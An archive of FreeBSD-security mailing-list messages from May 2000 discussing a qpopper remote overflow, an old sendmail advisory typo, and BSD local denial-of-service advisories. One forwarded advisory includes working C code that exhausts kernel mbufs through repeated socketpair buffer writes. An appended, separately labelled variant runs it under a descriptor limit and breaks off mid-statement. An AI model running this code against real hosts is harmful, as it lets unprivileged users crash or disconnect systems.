From owner-freebsd-security Mon May 29 7:14:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from vuurwerk.nl (envy.vuurwerk.nl [194.178.232.112]) by hub.freebsd.org (Postfix) with SMTP id 273CD37BA27 for ; Mon, 29 May 2000 07:14:10 -0700 (PDT) (envelope-from petervd@vuurwerk.nl)
Received: (qmail 98641 invoked from network); 29 May 2000 14:14:03 -0000
Received: from kesteren.vuurwerk.nl (HELO vuurwerk.nl) (194.178.232.59) by envy.vuurwerk.nl with SMTP; 29 May 2000 14:14:03 -0000
Received: (qmail 20175 invoked by uid 11109); 29 May 2000 14:14:03 -0000
Mail-Followup-To: freebsd-security@FreeBSD.ORG
Date: Mon, 29 May 2000 16:14:03 +0200
From: Peter van Dijk
To: freebsd-security@FreeBSD.ORG
Subject: Re: QPOPPER: Remote gid mail exploit
Message-ID: <20000529161403.H19887@vuurwerk.nl>
References: <20000525160410I.1001@eccosys.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <20000525160410I.1001@eccosys.com>; from sen_ml@eccosys.com on Thu, May 25, 2000 at 04:04:10PM +0900
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, May 25, 2000 at 04:04:10PM +0900, sen_ml@eccosys.com wrote:
[snip]
> > Here is the original advisory. Note that the actual advisory is
> > correct WRT the file and line numbers. The posts on Bugtraq indicate to
> > patch pop_msg.c instead of pop_uidl.c.
>
> while patching and restarting a qpopper server locally, i started
> wondering...how much of a problem is this on a freebsd system where
> /var/mail or /var/spool/mail is not setgid mail?

As with the IMAP exploit, this will give people a shell, which they usually
didn't have beforehand, when they are just popusers.

Greetz, Peter.
-- 
petervd@vuurwerk.nl - Peter van Dijk [student:developer:madly in love]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon May 29 12:52:45 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail2.wmptl.com (mail2.wmptl.com [216.221.73.131]) by hub.freebsd.org (Postfix) with ESMTP id ACC1337BEF2 for ; Mon, 29 May 2000 12:52:36 -0700 (PDT) (envelope-from webmaster@wmptl.com)
Received: from wmptl.com ([10.0.0.168]) by mail2.wmptl.com (8.9.3/8.9.3) with ESMTP id PAA53003 for ; Mon, 29 May 2000 15:58:41 -0400 (EDT) (envelope-from webmaster@wmptl.com)
Message-ID: <3932CA78.551BCAF2@wmptl.com>
Date: Mon, 29 May 2000 15:52:24 -0400
From: Nathan Vidican
Reply-To: webmaster@wmptl.com
X-Mailer: Mozilla 4.72 [en] (Win95; I)
X-Accept-Language: en
MIME-Version: 1.0
To: security@freebsd.org
Subject: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

The following is an excerpt taken from
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc;
please note that the subject seems to shift from sendmail over to Apache
under the section 'IV. Solution(s)'. I may be wrong here, but nonetheless I
assumed it'd be worth writing about. Seems like a typo to me?

II. Problem Description

Sendmail has the ability to deliver mail to a program on the local system
via a pipe. This feature is often used to support automatic mail filtering
and vacation programs. This provides a very flexible way to deliver
information to an automated task running on a mailserver.

Unfortunately, this allows unprivileged users to write tasks that may not
properly check for common attacks via the program delivery system.
The next release of FreeBSD will now install the sendmail restricted shell
utility, smrsh in /usr/libexec and create the directory /usr/libexec/sm.bin
to hold programs that may be executed by sendmail to deliver mail to pipes.

III. Impact

There is no known security impact on FreeBSD systems at the time of this
document's publication. There is no direct requirement to install the smrsh
utility. The FreeBSD Project suggests using smrsh in conjunction with
sendmail in environments where the local system administrator believes there
is a need to protect against as-of-yet undiscovered security holes in
sendmail.

Use of this utility is /not/ enabled by default in standard sendmail
configuration files distributed by FreeBSD to retain backwards compatibility
with previous sendmail operation. Use of this utility may break
functionality that users expect. Please read the smrsh(8) manual page and/or
the README file in /usr/src/usr.sbin/sendmail/smrsh BEFORE attempting to use
smrsh.

IV. Solution(s)

This program is available in the 2.1-stable and 2.2-current source code
distributions. It is not compiled, installed, or enabled in FreeBSD 2.1.0 by
default.

The Apache Group released version 1.05 of the daemon which fixes this
vulnerability. The FreeBSD Project updated the ports and packages system to
use this new daemon.
Interested parties may obtain an updated pre-compiled FreeBSD package from:

ftp://ftp.freebsd.org/pub/FreeBSD/packages-current/www/apache-1.0.5.tgz

and an updated "automatic port" from the directory hierarchy:

ftp://ftp.freebsd.org/pub/FreeBSD/ports-current/www/apache.tar.gz

From owner-freebsd-security Mon May 29 13: 5:33 2000
Delivered-To: freebsd-security@freebsd.org
Received: from server1.mich.com (server1.mich.com [198.108.16.2]) by hub.freebsd.org (Postfix) with ESMTP id 50C1837BCF3 for ; Mon, 29 May 2000 13:05:24 -0700 (PDT) (envelope-from will@almanac.yi.org)
Received: from almanac.yi.org (pm014-018.dialup.bignet.net [64.79.82.130]) by server1.mich.com (8.9.3/8.9.3) with ESMTP id QAA08307; Mon, 29 May 2000 16:05:16 -0400
Received: by almanac.yi.org (Postfix, from userid 1000) id AB4AE19A3; Mon, 29 May 2000 16:04:40 -0400 (EDT)
Date: Mon, 29 May 2000 16:04:40 -0400
From: Will Andrews
To: Nathan Vidican
Cc: security@FreeBSD.ORG
Subject: Re: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc
Message-ID: <20000529160440.C16637@argon.gryphonsoft.com>
References: <3932CA78.551BCAF2@wmptl.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <3932CA78.551BCAF2@wmptl.com>; from webmaster@wmptl.com on Mon, May 29, 2000 at 03:52:24PM -0400
X-Operating-System: FreeBSD 5.0-CURRENT i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, May 29, 2000 at 03:52:24PM -0400, Nathan Vidican wrote:
> The following is an excerpt taken from
> ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc,

This problem was addressed in 1996.. why are you bringing it up now?
Just because there appears to be some mistake in the advisory?
-- 
Will Andrews
GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w---
?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+
G++>+++ e->++++ h! r-->+++ y?

From owner-freebsd-security Mon May 29 13:12:54 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail2.wmptl.com (mail2.wmptl.com [216.221.73.131]) by hub.freebsd.org (Postfix) with ESMTP id 2289237BD17 for ; Mon, 29 May 2000 13:12:50 -0700 (PDT) (envelope-from webmaster@wmptl.com)
Received: from wmptl.com ([10.0.0.168]) by mail2.wmptl.com (8.9.3/8.9.3) with ESMTP id QAA53305; Mon, 29 May 2000 16:18:31 -0400 (EDT) (envelope-from webmaster@wmptl.com)
Message-ID: <3932CF1D.863BD9F@wmptl.com>
Date: Mon, 29 May 2000 16:12:13 -0400
From: Nathan Vidican
Reply-To: webmaster@wmptl.com
X-Mailer: Mozilla 4.72 [en] (Win95; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Will Andrews
Cc: security@freebsd.org
Subject: Re: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc
References: <3932CA78.551BCAF2@wmptl.com> <20000529160440.C16637@argon.gryphonsoft.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Will Andrews wrote:
>
> On Mon, May 29, 2000 at 03:52:24PM -0400, Nathan Vidican wrote:
> > The following is an excerpt taken from
> > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc,
>
> This problem was addressed in 1996.. why are you bringing it up now?
> Just because there appears to be some mistake in the advisory?
>
> --
> Will Andrews
> GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w---
> ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+
> G++>+++ e->++++ h! r-->+++ y?
I was wondering; I'm rather new to sendmail, and I wasn't aware of how old
this problem was. I didn't know if Apache actually made the fix, or if this
was a typo in the documentation; THAT is what I was asking. I was confused
about the documentation; I was referred to said document from a 'Security
Holes Explored' webpage. Sorry if I in any way sparked any aggression, I just
didn't understand the documentation. I am assuming at this point that it was
just a typo then, no?

Nathan Vidican
webmaster@wmptl.com
Windsor Match Plate & Tool Ltd.
http://www.wmptl.com/

From owner-freebsd-security Mon May 29 13:19:49 2000
Delivered-To: freebsd-security@freebsd.org
Received: from server1.mich.com (server1.mich.com [198.108.16.2]) by hub.freebsd.org (Postfix) with ESMTP id 82CA237BD01 for ; Mon, 29 May 2000 13:19:46 -0700 (PDT) (envelope-from will@almanac.yi.org)
Received: from almanac.yi.org (pm014-018.dialup.bignet.net [64.79.82.130]) by server1.mich.com (8.9.3/8.9.3) with ESMTP id QAA10157; Mon, 29 May 2000 16:19:12 -0400
Received: by almanac.yi.org (Postfix, from userid 1000) id 1635719A3; Mon, 29 May 2000 16:18:36 -0400 (EDT)
Date: Mon, 29 May 2000 16:18:36 -0400
From: Will Andrews
To: Nathan Vidican
Cc: Will Andrews , security@freebsd.org
Subject: Re: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-96:03.sendmail-suggestion.asc
Message-ID: <20000529161836.F16637@argon.gryphonsoft.com>
References: <3932CA78.551BCAF2@wmptl.com> <20000529160440.C16637@argon.gryphonsoft.com> <3932CF1D.863BD9F@wmptl.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <3932CF1D.863BD9F@wmptl.com>; from webmaster@wmptl.com on Mon, May 29, 2000 at 04:12:13PM -0400
X-Operating-System: FreeBSD 5.0-CURRENT i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, May 29, 2000 at 04:12:13PM -0400, Nathan Vidican wrote:
> I was wondering; I'm rather new to sendmail, and I wasn't aware of how
> old this problem was. I didn't know if Apache actually made the fix, or
> if this was a typo in the documentation; THAT is what I was asking. I
> was confused about the documentation; I was referred to said document
> from a 'Security Holes Explored' webpage. Sorry if I in any way sparked
> any aggression, I just didn't understand the documentation. I am
> assuming at this point that it was just a typo then, no?

Ah, it's just fine.. there's nothing wrong with browsing the archives. Note
that the name of the file you looked at is "FreeBSD-SA-96:03" which means
the 3rd advisory for the year 1996. Perhaps it was indeed a genuine mistake
in the advisory, but I wasn't around back then. Maybe Warner Losh, FreeBSD's
Security Officer, could address your questions.

But in general, I don't think anyone needs to worry about problems that are
4 years old and were taken care of. :-)

-- 
Will Andrews
GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w---
?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+
G++>+++ e->++++ h! r-->+++ y?
From owner-freebsd-security Mon May 29 15:36:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id CDAF037B7D9 for ; Mon, 29 May 2000 15:36:41 -0700 (PDT) (envelope-from silby@silby.com)
Received: (qmail 41458 invoked by uid 1000); 29 May 2000 22:36:40 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 29 May 2000 22:36:40 -0000
Date: Mon, 29 May 2000 17:36:40 -0500 (CDT)
From: Mike Silbersack
To: security@freebsd.org
Subject: NetBSD Security Advisory 2000-005 (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Out of curiosity; does anyone know if this vaguely defined problem affects
freebsd?

Mike "Silby" Silbersack

---------- Forwarded message ----------
Date: Sun, 28 May 2000 23:47:24 -0400
From: NetBSD Security Officer
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: NetBSD Security Advisory 2000-005

-----BEGIN PGP SIGNED MESSAGE-----

NetBSD Security Advisory 2000-005
=================================

Topic:      Local "cpu-hog" denial of service
Version:    all versions prior to 2000/04/20
Severity:   low; untrusted local user can hog CPU

Abstract
========

Untrusted local processes can hog cpu and kernel memory by tricking the
kernel into running exclusively on their behalf, denying other processes
the CPU.
From owner-freebsd-security Mon May 29 17:45:32 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A6F0B37B507 for ; Mon, 29 May 2000 17:45:28 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id SAA39140; Mon, 29 May 2000 18:45:26 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id SAA12276; Mon, 29 May 2000 18:45:09 -0600 (MDT)
Message-Id: <200005300045.SAA12276@harmony.village.org>
To: Mike Silbersack
Subject: Re: NetBSD Security Advisory 2000-005 (fwd)
Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Mon, 29 May 2000 17:36:40 CDT."
References:
Date: Mon, 29 May 2000 18:45:09 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Mike Silbersack writes:
: Out of curiosity; does anyone know if this vaguely defined problem affects
: freebsd?
Vaguely :-)

Warner

From owner-freebsd-security Mon May 29 19:34:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id 8E52B37B50B for ; Mon, 29 May 2000 19:34:04 -0700 (PDT) (envelope-from sen_ml@eccosys.com)
Received: (qmail 18987 invoked from network); 30 May 2000 02:29:49 -0000
Received: from localhost (127.0.0.1) by localhost with SMTP; 30 May 2000 02:29:49 -0000
To: freebsd-security@FreeBSD.ORG
Subject: Re: QPOPPER: Remote gid mail exploit
From: sen_ml@eccosys.com
In-Reply-To: <20000529161403.H19887@vuurwerk.nl>
References: <20000525160410I.1001@eccosys.com> <20000529161403.H19887@vuurwerk.nl>
X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN)
X-No-Archive: Yes
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20000530113403A.1001@eccosys.com>
Date: Tue, 30 May 2000 11:34:03 +0900
X-Dispatcher: imput version 20000228(IM140)
Lines: 19
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

From: Peter van Dijk
Subject: Re: QPOPPER: Remote gid mail exploit
Date: Mon, 29 May 2000 16:14:03 +0200
Message-ID: <20000529161403.H19887@vuurwerk.nl>

> On Thu, May 25, 2000 at 04:04:10PM +0900, sen_ml@eccosys.com wrote:
> [snip]
> > while patching and restarting a qpopper server locally, i started
> > wondering...how much of a problem is this on a freebsd system where
> > /var/mail or /var/spool/mail is not setgid mail?
>
> As with the IMAP exploit, this will give people a shell, which they usually
> didn't have beforehand, when they are just popusers.

since the problem has to do w/ a pop command that's issued after successful
authentication, if the user already has shell access, then there isn't
anything to worry about, is there? or is the shell running as some other
user?
From owner-freebsd-security Mon May 29 20: 0:12 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id D81DD37B59F for ; Mon, 29 May 2000 20:00:06 -0700 (PDT) (envelope-from bde@zeta.org.au)
Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.8.7/8.8.7) with ESMTP id MAA30908; Tue, 30 May 2000 12:59:52 +1000
Date: Tue, 30 May 2000 12:59:48 +1000 (EST)
From: Bruce Evans
X-Sender: bde@besplex.bde.org
To: Mike Silbersack
Cc: security@FreeBSD.ORG
Subject: Re: NetBSD Security Advisory 2000-005 (fwd)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 29 May 2000, Mike Silbersack wrote:

> Out of curiosity; does anyone know if this vaguely defined problem affects
> freebsd?
>
> Mike "Silby" Silbersack
>
> ---------- Forwarded message ----------
> Date: Sun, 28 May 2000 23:47:24 -0400
> From: NetBSD Security Officer
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: NetBSD Security Advisory 2000-005
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> NetBSD Security Advisory 2000-005
> =================================
>
> Topic:      Local "cpu-hog" denial of service
> Version:    all versions prior to 2000/04/20
> Severity:   low; untrusted local user can hog CPU

I fixed at least some of the cpu time hogs (mainly /dev/zero) in Feb. 1999.
I don't remember any fixes for the kernel space hogs (large malloc()s by
ktrace).
Bruce

From owner-freebsd-security Tue May 30 0:31:54 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 514DD37BD4A; Tue, 30 May 2000 00:31:53 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id AAA56545; Tue, 30 May 2000 00:31:53 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Tue, 30 May 2000 00:31:53 -0700 (PDT)
From: Kris Kennaway
To: sen_ml@eccosys.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: QPOPPER: Remote gid mail exploit
In-Reply-To: <20000530113403A.1001@eccosys.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 30 May 2000 sen_ml@eccosys.com wrote:

> > As with the IMAP exploit, this will give people a shell, which they usually
> > didn't have beforehand, when they are just popusers.
>
> since the problem has to do w/ a pop command that's issued after
> successful authentication, if the user already has shell access, then
> there isn't anything to worry about, is there? or is the shell
> running as some other user?

I don't believe this (the text you replied to above) is true. As I
understand it the vulnerability is that an attacker can send an email with
a certain header which will be parsed by the pop server when a client
downloads the email using the EUIDL command, at which point the buffer
overflows and can execute arbitrary code as gid mail (or whatever the pop
server runs as). So it's much worse than the imap hole.

As a consolation, it's harder to exploit on FreeBSD because of a fix we
made in the port, but it's still reportedly exploitable.
Kris

----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Tue May 30 0:52:50 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id 68C4F37B98A for ; Tue, 30 May 2000 00:52:38 -0700 (PDT) (envelope-from sen_ml@eccosys.com)
Received: (qmail 24678 invoked from network); 30 May 2000 07:48:21 -0000
Received: from localhost (127.0.0.1) by localhost with SMTP; 30 May 2000 07:48:21 -0000
To: freebsd-security@FreeBSD.ORG
Subject: Re: QPOPPER: Remote gid mail exploit
From: sen_ml@eccosys.com
In-Reply-To:
References: <20000530113403A.1001@eccosys.com>
X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN)
X-No-Archive: Yes
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20000530165232H.1001@eccosys.com>
Date: Tue, 30 May 2000 16:52:32 +0900
X-Dispatcher: imput version 20000228(IM140)
Lines: 30
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

From: Kris Kennaway
Subject: Re: QPOPPER: Remote gid mail exploit
Date: Tue, 30 May 2000 00:31:53 -0700 (PDT)
Message-ID:

> On Tue, 30 May 2000 sen_ml@eccosys.com wrote:
>
> > > As with the IMAP exploit, this will give people a shell, which they usually
> > > didn't have beforehand, when they are just popusers.
> >
> > since the problem has to do w/ a pop command that's issued after
> > successful authentication, if the user already has shell access, then
> > there isn't anything to worry about, is there? or is the shell
> > running as some other user?
>
> I don't believe this (the text you replied to above) is true.
> As I understand it the vulnerability is that an attacker can send an email
> with a certain header which will be parsed by the pop server when a client
> downloads the email using the EUIDL command, at which point the buffer
> overflows and can execute arbitrary code as gid mail (or whatever the pop
> server runs as). So it's much worse than the imap hole.

thanks a lot for the explanation.

> As a consolation, it's harder to exploit on FreeBSD because of a fix
> we made in the port, but it's still reportedly exploitable.

i'm a bit confused here -- does this mean the current port is still
vulnerable or that the port available at the time of the exploit
announcement happened to be hard to exploit?

From owner-freebsd-security Tue May 30 1:40:54 2000
Delivered-To: freebsd-security@freebsd.org
Received: from Athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id D125837B90B for ; Tue, 30 May 2000 01:40:40 -0700 (PDT) (envelope-from jus@security.za.net)
Received: from localhost (jus@localhost) by Athena.za.net (8.9.3/8.9.3) with ESMTP id KAA00271 for ; Tue, 30 May 2000 10:39:51 +0200 (SAST) (envelope-from jus@security.za.net)
X-Authentication-Warning: Athena.za.net: jus owned process doing -bs
Date: Tue, 30 May 2000 10:39:51 +0200 (SAST)
From: Justin Stanford
X-Sender: jus@Athena.za.net
To: freebsd-security@freebsd.org
Subject: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Tested as well on 3.4-STABLE and 4.0-STABLE - it works.
-- 
Justin Stanford
082 7402741
jus@security.za.net
www.security.za.net
IT Security and Solutions

---------- Forwarded message ----------
Date: Mon, 29 May 2000 09:05:23 -0500 (CDT)
From: Vacuum
To: news@technotronic.com
Subject: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability

Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability

Release Date: April 29, 2000

Systems Affected:
  FreeBSD 3.3-RELEASE
  FreeBSD 4.0-RELEASE
  FreeBSD 5.0 (maybe)
  Openbsd 2.5
  Openbsd 2.6
  Openbsd 2.7 (maybe)
  NetBSD 1.4.1
  NetBSD 1.4.2 (maybe)

THE PROBLEM

From an original posting made about last September by Sven Berkenvs
(sven@ILSE.NL) to bugtraq:

--- Forward ---

I stumbled across a denial of service attack on FreeBSD systems, where an
unprivileged user can panic the kernel. Quick and dirty testing (code
attached at the end of this mail) showed OpenBSD is vulnerable too:

FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to test it
on older FreeBSD versions.

OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
The kernel logs one "/bsd: mb_map full" and all processes trying to send
something over the network get stuck waiting in mbuf. Locally the system
continues to function. Tested by a friend.

NetBSD: Not available, but it is highly probable that the affected code in
OpenBSD is from its parent NetBSD.

--- End of Forward ---

Upon testing this code on the new versions of *bsd the exploit still works.

FreeBSD - 3.3-RELEASE: reboots the pc
FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: in the logs receives
    /kernel: xl0: no memory for rx list -- packet dropped!
  All network connection is dead and the route table is a mess.
FreeBSD - 5.0-Current: Untested
Openbsd - 2.5 (with NMBCLUSTERS=8192): mb_map full
Openbsd - 2.6 (with patches up to May 25, 2000): mb_map full
Openbsd - 2.7: Untested
NetBSD - 1.4.1: /netbsd: WARNING: mclpool limit reached; increase NMBCLUS
  The network connection is dead.
NetBSD - 1.4.2: Untested

From what I have tested on, Linux does not have any issue with this piece of
code. As for the other unices, they have not been tested.

THE CODE

The original code written by Sven Berkenvs that causes this:

/* system headers for socketpair(2), setsockopt(2), fcntl(2), write(2), exit(3) */
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>

#define BUFFERSIZE 204800

extern int
main(void)
{
	int p[2], i;
	char crap[BUFFERSIZE];

	/* keep creating AF_UNIX socket pairs until the kernel refuses one */
	while (1) {
		if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
			break;
		/* ask for 200 KB of send and receive buffer on both ends ... */
		i = BUFFERSIZE;
		setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
		setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
		setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
		setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
		fcntl(p[0], F_SETFL, O_NONBLOCK);
		fcntl(p[1], F_SETFL, O_NONBLOCK);
		/* ... and fill them, pinning that memory in the kernel's mbuf pool */
		write(p[0], crap, BUFFERSIZE);
		write(p[1], crap, BUFFERSIZE);
	}
	exit(0);
}

Underground Security Systems Research
http://www.ussrback.com

Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM,
HNN, Sub, prizm, b0f, Technotronic and Rfp.

Disclaimer: The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event shall
the author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.

Feedback: Please send suggestions, updates, and comments to:
Underground Security Systems Research
mail:labs@ussrback.com
http://www.ussrback.com

u n d e r g r o u n d   s e c u r i t y   s y s t e m s   r e s e a r c h
http://www.ussrback.com

------------ Output from pgp ------------
Opening file "/dev/null" type text.
Opening file "/home/jus/pgp4pine.tmp" type binary.
Signature by unknown keyid: 0x8D8FA0C3
Opening file "/dev/null" type text.
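The posted program is unbounded: nothing stops one unprivileged process from pinning socket buffer memory pair after pair until the mbuf pool is gone. The program below is an added example written for this page, not part of the forwarded advisory or of any reply in the thread. It re-runs the same loop under a per-process descriptor limit, the kind of limit the csh limit builtin or login.conf(5) sets (what Alfred's "man limit" reply later in the thread points at), and reports where socketpair() stops. The 64 KiB buffer size, the 64-descriptor limit and the MAX_PAIRS ceiling are assumptions chosen for the demonstration.

```c
/* Added example, not from the advisory or any reply in this thread: the
 * posted exhaustion loop re-run under a per-process descriptor limit of the
 * kind the csh limit builtin / login.conf(5) sets. Buffer size, limit and
 * the MAX_PAIRS ceiling are assumptions made for the demonstration. */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFERSIZE 65536   /* assumed; the posted program asked for 204800 */
#define MAX_PAIRS  4096    /* hard ceiling so the demonstration cannot run away */

/* Run the socketpair()/SO_SNDBUF loop with the soft RLIMIT_NOFILE set to
 * fd_limit. Returns how many pairs were created before socketpair() failed
 * (-1 if the limit could not be applied) and stores the errno that stopped
 * the loop in *stop_errno. The old limit is restored and every descriptor
 * closed before returning, so the function can be called repeatedly. */
int run_bounded_exhaustion(rlim_t fd_limit, int *stop_errno)
{
    struct rlimit old, lim;
    int pairs[MAX_PAIRS][2];
    int n = 0, i, bufsz, err = 0;
    char *crap;

    if (getrlimit(RLIMIT_NOFILE, &old) != 0)
        return -1;
    lim = old;
    lim.rlim_cur = fd_limit;                 /* lower the soft limit only */
    if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
        return -1;

    crap = malloc(BUFFERSIZE);
    if (crap == NULL) {
        setrlimit(RLIMIT_NOFILE, &old);
        return -1;
    }
    memset(crap, 'A', BUFFERSIZE);

    while (n < MAX_PAIRS) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, pairs[n]) == -1) {
            err = errno;                     /* EMFILE once the fd table is full */
            break;
        }
        bufsz = BUFFERSIZE;
        for (i = 0; i < 2; i++) {
            setsockopt(pairs[n][i], SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof bufsz);
            setsockopt(pairs[n][i], SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof bufsz);
            fcntl(pairs[n][i], F_SETFL, O_NONBLOCK);
        }
        /* Non-blocking: whatever fits in the socket buffer is now pinned in
         * kernel memory; the remainder is simply not written. */
        for (i = 0; i < 2; i++) {
            ssize_t w = write(pairs[n][i], crap, BUFFERSIZE);
            (void)w;
        }
        n++;
    }

    for (i = 0; i < n; i++) {
        close(pairs[i][0]);
        close(pairs[i][1]);
    }
    free(crap);
    setrlimit(RLIMIT_NOFILE, &old);
    if (stop_errno != NULL)
        *stop_errno = err;
    return n;
}

int main(void)
{
    int err = 0;
    int n = run_bounded_exhaustion(64, &err);
    if (n < 0) {
        perror("rlimit");
        return 1;
    }
    printf("pairs created under a 64-descriptor limit: %d, stopped by: %s\n",
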